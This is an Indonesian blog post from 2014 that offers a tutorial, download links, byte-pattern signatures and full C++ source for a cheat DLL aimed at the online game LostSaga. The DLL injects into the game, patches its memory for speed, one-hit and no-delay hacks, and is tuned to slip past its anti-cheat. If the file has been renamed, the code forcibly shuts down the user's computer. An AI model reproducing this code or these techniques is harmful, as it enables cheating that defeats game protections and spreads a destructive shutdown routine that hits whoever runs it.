Sabtu, 07 Juni 2014

Cara Membuat DLL Cheat & Mencari Offset LostSaga [Berbagi Ilmu Cheat] Alat-Alat : [-]Video Tutor [-]Source Code Permanent LostSaga [-]AOB Permanent LS [-]Dev C++ [-]Cheat Engine 5.6.1 Caranya udah ada di Videonya OM Denger aja dan liat bersuara original by Dimas Syahputra DEV : http://sourceforge.net/projects/dev-cpp/files/Binaries/Dev-C%2B%2B%204.9.9.2/devcpp-4.9.9.2_setup.exe/download CE : http://www.ziddu.com/download/10664253/CheatEngine561.exe.html Video TUTOR : ( HANYA SUARA )http://www.mediafire.com/?46tk4p9bilpt6it << Pass : MyNameMikazu Source Code Permanent LostSaga : Spoiler Hidden Content //===================================// //Name : Base LostSaga Fullhacks //Created : ™GMPB_SC™ //Thank'z : ALL Admin JamuCit //Notice : Nice! JamuCit //===================================// #define WIN32_LEAN_AND_MEAN #include #include #include //============ OFFSET ============ #define NoDelay 0x #define OneHitCSD 0x #define FallDamage 0x #define SpeedHack 0x //============ OFFSET ============ LPTSTR ModulGame = "lostsaga.exe"; void Patch(void *adr, void *ptr, int size) { DWORD OldProtection; VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &OldProtection); memcpy(adr,ptr,size); VirtualProtect(adr,size,OldProtection, &OldProtection); } void WritePointer(unsigned long ulBase, int iOffset, int iValue) { if (!IsBadReadPtr((VOID*)ulBase, sizeof(unsigned long))) { if (!IsBadWritePtr((void*)(*(unsigned long*)ulBase + iOffset), sizeof(unsigned long))) { *(int*)(*(unsigned long*)ulBase + iOffset) = iValue; } } } void SagaHacy() { while(1) { //========== No Delay ==========// if (GetAsyncKeyState(VK_F1)&1) { MessageBeep(MB_ICONINFORMATION); DWORD adrMin1, adrMin2 = 0; DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe"); if (dwPB > 0) { adrMin1 = dwPB + (DWORD)NoDelay; Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3); // Jangan di ganti Agar WORK } } //========== 1 Hit Crusade ==========// if (GetAsyncKeyState(VK_F2)&1) { MessageBeep(MB_ICONINFORMATION); DWORD adrMin1, adrMin2 = 0; DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe"); if (dwPB > 0) { adrMin1 = dwPB + (DWORD)OneHitCSD; Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3);// Jangan di ganti Agar WORK } } //========== Fall Damage UP ==========// if (GetAsyncKeyState(VK_F3)&1) { MessageBeep(MB_ICONINFORMATION); DWORD adrMin1, adrMin2 = 0; DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe"); if (dwPB > 0) { adrMin1 = dwPB + (DWORD)FallDamage; Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3);// Jangan di ganti Agar WORK } } //========== SpeedHack Hook ==========// if (GetAsyncKeyState(VK_F4)&1) { MessageBeep(MB_ICONINFORMATION); DWORD adrMin1, adrMin2 = 0; DWORD dwPB = (DWORD)GetModuleHandleA("lostsaga.exe"); if (dwPB > 0) { adrMin1 = dwPB + (DWORD)SpeedHack; Patch((void *)(adrMin1),(void*)(PBYTE)"\x00\x00\x00", 3);// Jangan di ganti Agar WORK } } Sleep(100); //Jangan di ganti , Agar Tembus GG Cowboy } } BOOL APIENTRY DllMain(HINSTANCE hDll, DWORD callReason, LPVOID lpReserved) { DisableThreadLibraryCalls(hDll); if(callReason == DLL_PROCESS_ATTACH) { MessageBox(0, "Credit by ™GMPB_SC™\n\nThank'z to : ALL Admin JamuCit", "Notice",MB_ICONINFORMATION | MB_OKCANCEL); // Notice yg Keluar MessageBox(0, "No Delay : F1\n1 Hit Crusade : F2\nFall Damage UP : F3\nSpeedHack Hook : F4\n\nTekan Saat Splash Cowboy Menghilang / Saat Mulai Splash Screen Hitam", "Just Work to OS Win 7",MB_ICONWARNING | MB_OKCANCEL); // Notice yg Keluar CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&SagaHacy,0, 0, 0); char strDLLName [_MAX_PATH]; GetModuleFileName(hDll, strDLLName , _MAX_PATH); if (strstr(strDLLName, "Prohacy.dll") <= 0) {//Nama DLL Asli // tampilkan pesan, kalo dll nya sdh bukan asli / sudah di rename MessageBox(0, "Ente Leacher ?","Deteckor",MB_ICONSTOP | MB_OK); MessageBox(0, "Udah dikasih kok rename ?","Deteckor",MB_ICONSTOP | MB_OK); MessageBox(0, "Dadah !\nKompimu aku Restart ya :*","Deteckor",MB_ICONSTOP | MB_OK); system("start C:/Windows/System32/shutdown.exe -s -f -t 00"); ExitProcess(0);//ERROR } } } AOB Permanent LS : Spoiler Hidden Content No Delay : 4F 6E 50 75 73 68 53 74 72 75 63 74 44 65 6C 61 79 1 Hit Crusade : 4D 41 58 5F 48 50 5F 55 50 Fall Damage UP : 53 54 52 5F 44 41 4D 41 47 45 5F 55 50 Move Speed UP : 4D 4F 56 45 5F 53 50 45 45 44 5F 55 50 Dimohon Keras ! Saat anda sudah mengerti harap sertakan Thank'z untuk Dimas Syahputra & Prohacy Teamz Jika tidak , Maka kau tidak menghargai kerja keras kami Terima Kasih

berbagi bersama